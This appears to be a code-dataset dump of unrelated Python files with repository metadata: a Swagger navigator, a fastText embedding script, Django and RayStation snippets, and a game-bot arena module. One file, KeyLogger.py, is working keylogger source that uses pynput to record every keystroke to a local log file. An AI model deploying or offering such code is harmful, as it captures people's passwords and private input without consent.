raise ValueError('{} value {} is not a string.'.format(navigator, navigator.value))
return navigator
def remove_string(self, selector, default=REQUIRED):
navigator = self.get_string(selector, default)
self.remove(selector, default is REQUIRED)
return navigator
@property
def is_boolean(self):
return isinstance(self.value, bool)
def get_boolean(self, selector, default=REQUIRED):
navigator = self.get(selector, default=default)
if not (navigator.is_boolean or navigator.is_none):
raise ValueError('{} value {} is not a boolean.'.format(navigator, navigator.value))
return navigator
def remove_boolean(self, selector, default=REQUIRED):
navigator = self.get_boolean(selector, default)
self.remove(selector, default is REQUIRED)
return navigator
@property
def is_int(self):
return isinstance(self.value, int)
def get_int(self, selector, default=REQUIRED):
navigator = self.get(selector, default=default)
if not (navigator.is_int or navigator.is_none):
            raise ValueError('{} value {} is not an integer.'.format(navigator, navigator.value))
return navigator
def remove_int(self, selector, default=REQUIRED):
navigator = self.get_int(selector, default)
self.remove(selector, default is REQUIRED)
return navigator
def get_root(self):
        if self.parent is None:
return self
return self.parent.get_root()
@property
def is_ref(self):
return self.is_object and self.contains('$ref')
# Returns a SwaggerNavigator object at the position of the ref this navigator has found
def resolve_ref(self, ref = None):
if not ref: ref = self.get_string('$ref').value
ref_path = ref.split("/")
if ref_path[0] == "#":
nav = self.get_root()
ref_path.pop(0)
else:
nav = self.parent
while ref_path:
try:
nav = nav.get(ref_path.pop(0))
except ValueError as e:
raise ValueError("Error {} while resolving reference {} at {}".format(e, ref, self))
return nav
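# Hedged usage sketch (not part of the original file): navigate a minimal,
# invented swagger document and resolve a $ref back to its definition.
def _demo_navigator():
    doc = {
        'definitions': {'Pet': {'type': 'object'}},
        'paths': {'/pets': {'get': {'responses': {'200': {
            'schema': {'$ref': '#/definitions/Pet'}}}}}},
    }
    root = SwaggerNavigator(doc)
    schema = (root.get('paths').get('/pets').get('get')
                  .get('responses').get('200').get('schema'))
    assert schema.is_ref
    return schema.resolve_ref().value  # -> {'type': 'object'}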
| 34.927711
| 128
| 0.61366
|
82c2a1c2c6d7ae30428299a80bdc638401533916
| 498
|
py
|
Python
|
KeyLogger.py
|
Kyogin/PythonGERAL
|
1e1be167c698050230fc07a3ddd2a2879fd26208
|
[
"MIT"
] | null | null | null |
KeyLogger.py
|
Kyogin/PythonGERAL
|
1e1be167c698050230fc07a3ddd2a2879fd26208
|
[
"MIT"
] | null | null | null |
KeyLogger.py
|
Kyogin/PythonGERAL
|
1e1be167c698050230fc07a3ddd2a2879fd26208
|
[
"MIT"
] | null | null | null |
#Code by: Matheus Franco // Kyogin
#Educational Content ONLY
#Feel free to change this code
from pynput.keyboard import Key, Listener
import logging
log_dir = "hook.txt" #.txt será criado no diretório no seu .py, caso queira alterar, colocar o caminho aí
logging.basicConfig(filename=(log_dir + "key_log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
| 31.125
| 112
| 0.7249
|
4add4764e6f89b7b8ec08aa8ce427f8af47af362
| 134
|
py
|
Python
|
Proyecto/DacodesJobs/Modulos/Candidatos/urls.py
|
angel318/DacodesJobs
|
3a8bb0248ab8addf462b175e039ae935a5e34197
|
[
"bzip2-1.0.6"
] | null | null | null |
Proyecto/DacodesJobs/Modulos/Candidatos/urls.py
|
angel318/DacodesJobs
|
3a8bb0248ab8addf462b175e039ae935a5e34197
|
[
"bzip2-1.0.6"
] | null | null | null |
Proyecto/DacodesJobs/Modulos/Candidatos/urls.py
|
angel318/DacodesJobs
|
3a8bb0248ab8addf462b175e039ae935a5e34197
|
[
"bzip2-1.0.6"
] | null | null | null |
from django.urls import path
from .views import *
urlpatterns = [
path('<int:pk>', Candidatos.as_view(), name = 'Candidatos'),
]
| 19.142857
| 64
| 0.671642
|
f30780e17957580236e6460b273c028bb42b93c2
| 2,642
|
py
|
Python
|
aidistillery/fasttext_embeddings.py
|
TheMTank/arxiv-summariser
|
db4f1e42bcc9185e197a00a18e280a4a3011453c
|
[
"MIT"
] | 17
|
2018-11-26T23:06:20.000Z
|
2022-01-18T21:43:17.000Z
|
aidistillery/fasttext_embeddings.py
|
TheMTank/arxiv-summariser
|
db4f1e42bcc9185e197a00a18e280a4a3011453c
|
[
"MIT"
] | 3
|
2018-11-27T12:17:20.000Z
|
2019-02-05T11:40:44.000Z
|
aidistillery/fasttext_embeddings.py
|
TheMTank/arxiv-summariser
|
db4f1e42bcc9185e197a00a18e280a4a3011453c
|
[
"MIT"
] | 3
|
2019-03-06T10:14:08.000Z
|
2020-01-21T17:26:20.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Generate embeddings using word2vec from a text collection
Example: `distill fasttext -f data/text -o data/saved_embedding -d 100`
"""
import argparse
from .data_cleaning import list_of_strings_to_list_of_lists, clean_raw_text_from_file, phrasing_sentences
from .models import fasttext_wrapper
def load_and_process(file_name, min_length):
"""
Arguments
---------
file_name: file that contains text from which we want to generate embeddings
min_length: required min length of sentences to be considered
Returns
-------
List of list of tokens for gensim.word2vec input
"""
cleaned_text = clean_raw_text_from_file(file_name, min_length=min_length)
phrased_lists = list_of_strings_to_list_of_lists(cleaned_text)
return phrased_lists
def fasttext_add_args(parser):
parser.add_argument('-f', '--file_name', default="text_to_embed.txt",
help="Text file")
parser.add_argument('-d', '--dimension', default="100",
help="Dimension of the desired embeddings", type=int)
parser.add_argument('-w', '--window', default="5",
help="Size of the window", type=int)
parser.add_argument('-mc', '--min_count', default="5",
help="Min number of occurrence of words", type=int)
parser.add_argument('-ml', '--min_length', default="200",
help="Min number of chars for a sentence", type=int)
parser.add_argument('-it', '--iterations', default="5",
help="Number of iteration for learning the embeddings", type=int)
parser.add_argument('-ws', '--workers', default="2",
help="Number of workers for this task", type=int)
parser.add_argument('-data', '--data', default="no_name_data",
help="Dataset name")
parser.add_argument('-o', '--output_file', default="output_embedding",
help="Output embedding file")
def fasttext_main(args):
print("Creating Embeddings with:", args.dimension, "dimensions", args.window, "window", args.min_count, "min_count")
print("Sentences with less than", args.min_length, "chars will be removed")
sentences = load_and_process(args.file_name, args.min_length)
ft = fasttext_wrapper.FastTextWrapper(sentences,
dimension=args.dimension,
window=args.window,
min_count=args.min_count,
workers=args.workers,
sg=0,
iterations=args.iterations)
model = ft.fit()
model.save(args.output_file)
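# Hedged usage sketch (not part of the original module): this file is meant to
# be driven by the project's `distill` CLI, but the argparse plumbing above can
# be exercised along these lines. Because of the relative imports it still has
# to run as a module inside the package (roughly `python -m aidistillery.fasttext_embeddings`).
if __name__ == '__main__':
    _parser = argparse.ArgumentParser(description=__doc__)
    fasttext_add_args(_parser)
    fasttext_main(_parser.parse_args())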
| 37.211268
| 120
| 0.645344
|
b9ccf8c7b76cc287cd9ed06dbcfb491455f4cf1f
| 755
|
py
|
Python
|
ROIAlgebraOperation/ContourDelTest.py
|
az7jh2/My-Raystation-Scripts
|
3454378239320c2944fd96de8cb86be8824b5210
|
[
"MIT"
] | 1
|
2021-05-29T22:48:49.000Z
|
2021-05-29T22:48:49.000Z
|
ROIAlgebraOperation/ContourDelTest.py
|
az7jh2/My-Raystation-Scripts
|
3454378239320c2944fd96de8cb86be8824b5210
|
[
"MIT"
] | null | null | null |
ROIAlgebraOperation/ContourDelTest.py
|
az7jh2/My-Raystation-Scripts
|
3454378239320c2944fd96de8cb86be8824b5210
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from connect import *
patient=get_current('Patient')
examination=get_current('Examination')
structure_set=patient.PatientModel.StructureSets[examination.Name]
roi_geometries=structure_set.RoiGeometries['Bodys']
if hasattr(roi_geometries.PrimaryShape,'Contours'):
    # this ROI's PrimaryShape is of type Contours
contour=roi_geometries.PrimaryShape.Contours
index=range(len(contour))
index.reverse()
for i in index:
        if contour[i][0].z > -80.56 or contour[i][0].z < -89.56:
contour.RemoveAt(i)
    # Testing shows contour and contour[i] are of type List[object], and contour[i][j] is an ExpandoObject
    # When elements are removed from the list, later elements shift forward into the removed position
    # To traverse and delete at the same time, iterating in reverse order is recommended
    # RayStation provides three element-removal methods: contour.RemoveAll(), RemoveAt(), RemoveRange()
    # In these methods indices start at 0 and negative indices are not supported
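# Illustrative sketch (not RayStation-specific): why the comments above
# recommend deleting in reverse order. Forward deletion skips the element that
# slides into the freed slot; reverse deletion visits every index exactly once.
def _demo_reverse_delete():
    values = [1, 2, 2, 3]
    for i in reversed(range(len(values))):
        if values[i] == 2:
            del values[i]
    return values  # -> [1, 3]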
| 31.458333
| 76
| 0.745695
|
ec939033c7afc401ed251ca6deed6ca722fa0638
| 761
|
py
|
Python
|
src/compas_rv2/ui/Rhino/RV2/dev/RV2form_attributes_cmd.py
|
selinabitting/compas-RV2
|
0884cc00d09c8f4a75eb2b97614105e4c8bfd818
|
[
"MIT"
] | 34
|
2020-04-27T13:54:38.000Z
|
2022-01-17T19:16:27.000Z
|
src/compas_rv2/ui/Rhino/RV2/dev/RV2form_attributes_cmd.py
|
selinabitting/compas-RV2
|
0884cc00d09c8f4a75eb2b97614105e4c8bfd818
|
[
"MIT"
] | 306
|
2020-04-27T12:00:54.000Z
|
2022-03-23T22:28:54.000Z
|
src/compas_rv2/ui/Rhino/RV2/dev/RV2form_attributes_cmd.py
|
selinabitting/compas-RV2
|
0884cc00d09c8f4a75eb2b97614105e4c8bfd818
|
[
"MIT"
] | 11
|
2020-06-30T08:23:40.000Z
|
2022-02-01T20:47:39.000Z
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from compas_rv2.rhino import get_scene
from compas_rv2.rhino import AttributesForm
from compas_rv2.rhino import rv2_error
__commandname__ = "RV2form_attributes"
@rv2_error()
def RunCommand(is_interactive):
scene = get_scene()
if not scene:
return
form = scene.get("form")[0]
if not form:
print("There is no FormDiagram in the scene.")
return
AttributesForm.from_sceneNode(form)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
RunCommand(True)
| 21.138889
| 80
| 0.575558
|
d8cb0a8763608964a48dff37d11fcda4d170f96d
| 5,957
|
py
|
Python
|
bestmobabot/arena.py
|
moonzlo/bestmobabot
|
8229de71a9d288daf6a7e513907821570e2eb111
|
[
"MIT"
] | 2
|
2020-04-29T03:59:49.000Z
|
2021-11-25T17:07:44.000Z
|
bestmobabot/arena.py
|
moonzlo/bestmobabot
|
8229de71a9d288daf6a7e513907821570e2eb111
|
[
"MIT"
] | null | null | null |
bestmobabot/arena.py
|
moonzlo/bestmobabot
|
8229de71a9d288daf6a7e513907821570e2eb111
|
[
"MIT"
] | 1
|
2022-03-13T12:32:21.000Z
|
2022-03-13T12:32:21.000Z
|
"""
Arena hero selection logic.
"""
import math
from functools import reduce
from itertools import combinations, permutations
from operator import attrgetter, itemgetter
from typing import Callable, Iterable, List, Tuple, Optional, TypeVar
import numpy
from bestmobabot import types
from bestmobabot.logger import logger
from bestmobabot.model import model
from bestmobabot.responses import ArenaEnemy, GrandArenaEnemy, Hero
TEAM_SIZE = 5 # heroes
GRAND_TEAMS = 3
GRAND_SIZE = GRAND_TEAMS * TEAM_SIZE # heroes
TArenaEnemy = TypeVar('TArenaEnemy', ArenaEnemy, GrandArenaEnemy)
T = TypeVar('T')
T1 = TypeVar('T1')
T2 = TypeVar('T2')
# Shared for both arenas.
# ----------------------------------------------------------------------------------------------------------------------
def filter_enemies(enemies: Iterable[TArenaEnemy], clan_id: Optional[types.ClanID]) -> List[TArenaEnemy]:
return [enemy for enemy in enemies if enemy.user is not None and not enemy.user.is_from_clan(clan_id)]
def naive_select_attackers(heroes: Iterable[Hero]) -> List[Hero]:
"""
Selects the most powerful heroes.
"""
return sorted(heroes, key=attrgetter('power'), reverse=True)[:TEAM_SIZE]
# Enemy selection.
# ----------------------------------------------------------------------------------------------------------------------
def select_enemy(enemies: Iterable[ArenaEnemy], heroes: Iterable[Hero]) -> Tuple[TArenaEnemy, List[Hero], float]:
"""
Select enemy and attackers to maximise win probability.
"""
# noinspection PyTypeChecker
return max([(enemy, *model_select_attackers(heroes, enemy.heroes)) for enemy in enemies], key=itemgetter(2))
def select_grand_enemy(enemies: Iterable[GrandArenaEnemy], heroes: Iterable[Hero]) -> Tuple[GrandArenaEnemy, List[List[Hero]], float]:
"""
Select enemy and attackers to maximise win probability.
"""
# noinspection PyTypeChecker
return max([(enemy, *model_select_grand_attackers(heroes, enemy.heroes)) for enemy in enemies], key=itemgetter(2))
# Attackers selection.
# ----------------------------------------------------------------------------------------------------------------------
def model_select_attackers(heroes: Iterable[Hero], defenders: Iterable[Hero], verbose: bool = True) -> Tuple[List[Hero], float]:
"""
Select attackers for the given enemy to maximise win probability.
"""
attackers_list = [list(attackers) for attackers in combinations(heroes, TEAM_SIZE)]
x = numpy.array([get_model_features(attackers) for attackers in attackers_list]) - get_model_features(defenders)
y: numpy.ndarray = model.predict_proba(x)[:, 1]
index: int = y.argmax()
if verbose:
logger.debug(f'👊 Win probability: {100.0 * y[index]:.1f}%.')
return attackers_list[index], y[index]
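# Note (illustrative, not from the original module): every candidate line-up is
# scored in a single vectorised call -- the summed feature vector of the
# attackers minus that of the defenders goes into the pre-trained classifier,
# and predict_proba(...)[:, 1] is the win-class probability for each candidate row.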
def model_select_grand_attackers(heroes: Iterable[Hero], defenders_teams: Iterable[Iterable[Hero]]) -> Tuple[List[List[Hero]], float]:
"""
Select 3 teams of attackers for the given enemy to maximise win probability.
It's not giving the best solution but it's fast enough.
"""
defenders_teams = list(defenders_teams)
selections: List[Tuple[List[List[Hero]], float]] = []
# Try to form attackers teams in different order and maximise the final probability.
for order in permutations(range(3)):
used_heroes = set()
attackers_teams: List[List[Hero]] = [[], [], []]
probabilities: List[float] = [0.0, 0.0, 0.0]
for i in order:
heroes_left = [hero for hero in heroes if hero.id not in used_heroes]
attackers, probabilities[i] = model_select_attackers(heroes_left, defenders_teams[i], verbose=False)
attackers_teams[i] = attackers
used_heroes.update(attacker.id for attacker in attackers)
p1, p2, p3 = probabilities
p = p1 * p2 * p3 + p1 * p2 * (1.0 - p3) + p2 * p3 * (1.0 - p1) + p1 * p3 * (1.0 - p2)
selections.append((attackers_teams, p))
# Choose best selection.
attackers_teams, probability = max(selections, key=itemgetter(1))
logger.debug(f'👊 Win probability: {100.0 * probability:.1f}%.')
return attackers_teams, probability
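# Worked check (illustrative, not from the original module): the expression for
# `p` above is P(win at least 2 of the 3 independent battles). With
# p1 = p2 = p3 = 0.5 it reduces to 0.125 + 3 * (0.25 * 0.5) = 0.5, as expected.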
# Features construction.
# ----------------------------------------------------------------------------------------------------------------------
def get_model_features(heroes: Iterable[Hero]) -> numpy.ndarray:
"""
Build model features for the specified heroes.
"""
return reduce(numpy.add, (hero.features for hero in heroes))
# Utilities.
# ----------------------------------------------------------------------------------------------------------------------
def secretary_max(items: Iterable[T1], n: int, key: Optional[Callable[[T1], T2]] = None) -> Tuple[T1, T2]:
"""
Select best item while lazily iterating over the items.
https://en.wikipedia.org/wiki/Secretary_problem#Deriving_the_optimal_policy
"""
key = key or (lambda item: item)
# We want to look at each item only once.
iterator = iter((item, key(item)) for item in items)
r = int(n / math.e) + 1
# Skip first (r - 1) items and remember the maximum.
_, max_key = max((next(iterator) for _ in range(r - 1)), key=itemgetter(1), default=(None, None))
# Find the first one that is better or the last one.
for item, item_key in iterator: # type: T1, T2
if max_key is None or item_key > max_key:
break
# noinspection PyUnboundLocalVariable
return item, item_key
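# Hedged usage sketch (not part of the original module): scan a stream of
# random scores once and stop at the first value that beats the best of the
# first ~n/e observations, per the secretary policy above. Values are illustrative.
def _demo_secretary_max():
    import random
    scores = [random.random() for _ in range(100)]
    best, best_score = secretary_max(scores, len(scores))
    return best, best_score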
def choose_multiple(items: Iterable[T], n: int, k: int) -> Iterable[Tuple[List[T], ...]]:
"""
Choose n groups of size k.
"""
if n == 0:
yield ()
return
for head in choose_multiple(items, n - 1, k):
used_keys = {item.id for sub_items in head for item in sub_items}
for tail in combinations((item for item in items if item.id not in used_keys), k):
yield (*head, [*tail])
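# Hedged usage sketch (not part of the original module): choose_multiple expects
# items exposing an ``id`` attribute, so a tiny namedtuple stands in for Hero here.
def _demo_choose_multiple():
    from collections import namedtuple
    Item = namedtuple('Item', 'id')
    items = [Item(i) for i in range(4)]
    # 6 ordered ways to split 4 items into 2 disjoint pairs
    return list(choose_multiple(items, n=2, k=2))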
| 39.713333
| 134
| 0.616082
|